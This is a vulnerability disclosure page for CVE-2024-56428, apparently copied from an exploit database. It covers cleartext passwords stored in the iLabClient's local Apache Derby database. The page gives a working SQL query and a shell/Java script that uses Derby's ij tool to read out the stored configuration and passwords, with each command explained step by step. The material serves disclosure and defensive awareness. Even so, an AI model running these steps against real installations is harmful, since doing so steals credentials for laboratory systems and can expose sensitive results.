Share
## https://sploitus.com/exploit?id=296FE72F-F83B-539A-A593-0F7E8A4057C3
CVE-2024-56428
==============
***Cleartext credentials in local database of the iLabClient***

<br>

### Read out the configuration incl. password
The iLabClient is used to download the results from the laboratory server. The configuration data
are stored locally in the Apache Derby instance `iLabClient`. The password is stored in plain text. In order to
be able to read this, a connection to the local database must first be established, for example as described in
[CVE-2024-56429](https://github.com/lisa-2905/CVE-2024-56429).<br>

Read out the passwords:
```
select EINSTELLUNGEN from configs;
```
<br>

### Automated script

The `get_configs.sh` script can be executed to read out the configuration data. It is important that
no other program (e.g. the iLabClient itself) accesses the database during execution. 

Explanations to the script:<br>
```
#! /bin/bash
"C:\ilabClient\java8u422\bin\java.exe" -jar ".\derby-lib\derbyrun.jar" ij script_sql.sql
read
```

`"C:\ilabClient\java8u422\bin\java.exe"`: Use of the Java version supplied with the installation of the client. Change 
this if the client was installed in a different directory.<br>
`-jar`: Instruction that a JAR file is to be executed<br>
`".\derby-lib\derbyrun.jar ij"` Execution of the `ij` tool from Apache Derby<br>
`script_sql.sql`: Script that reads out the corresponding configurations. Change the path to the database in this file 
when the client was installed in a different directory.<br>

------

Discoverer: Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)